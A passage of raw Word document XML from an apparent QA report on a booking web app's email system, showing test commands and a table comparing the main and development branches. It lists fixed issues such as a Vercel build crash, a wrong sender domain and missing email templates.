          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SKIP_SEND</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>--experimental-strip-types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> scripts/test-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>emails.mjs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># Send to a different address:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TEST_EMAIL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">your@email.com </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>--experimental-strip-types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> scripts/test-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>emails.mjs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47D0EFED" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="426352A8">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35913D87" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc228978584"/>
      <w:bookmarkStart w:id="14" w:name="branch-comparison-main-vs-development"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Branch Comparison: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>development</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="1FF22323"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Before testing, a full diff was performed between the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (production) branch and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>development</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273AA6F2"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Key finding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains only 3 commits (the initial monolithic build). </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>development</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>31 commits ahead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and contains all live functionality. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> branch would fail in production for the following reasons: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644"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="4AF26B79"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="1023525B"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 xml:space="preserve">Issue in </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="361B28A1"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 xml:space="preserve">Status in </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>development</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="300BD966" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5111E9A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Resend instantiated at module level </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vercel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> build crash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="373CBC2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Fixed: dynamic </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>import('resend')</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> inside handlers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="09511358" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="519FE9B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FROM address using wrong domain (</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>barberboost.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7ED6964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Fixed: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>barberboost.app</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> everywhere</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="17A73AB2" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="065FC4C1"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RESEND_FROM_EMAIL</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> validated as strict email, rejects </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"Name &lt;email&gt;"</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="230BD2E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Fixed: relaxed to </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>min(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="29D63BA8" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0583706C" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>bookingRef</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field missing from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>BookingEmailData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> template throws</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1E7C83B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Fixed: added to interface and all callers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="37270D7C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1ABB61A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No plain-text fallback on any template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="219DA09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Fixed: </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>text</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field added to all 8 templates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="282F47CB" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="703D2A35" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>staffInvitation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> template missing entirely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75891D2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Added</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="24836A5A" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="38E1F144" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>newSignupAlert</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
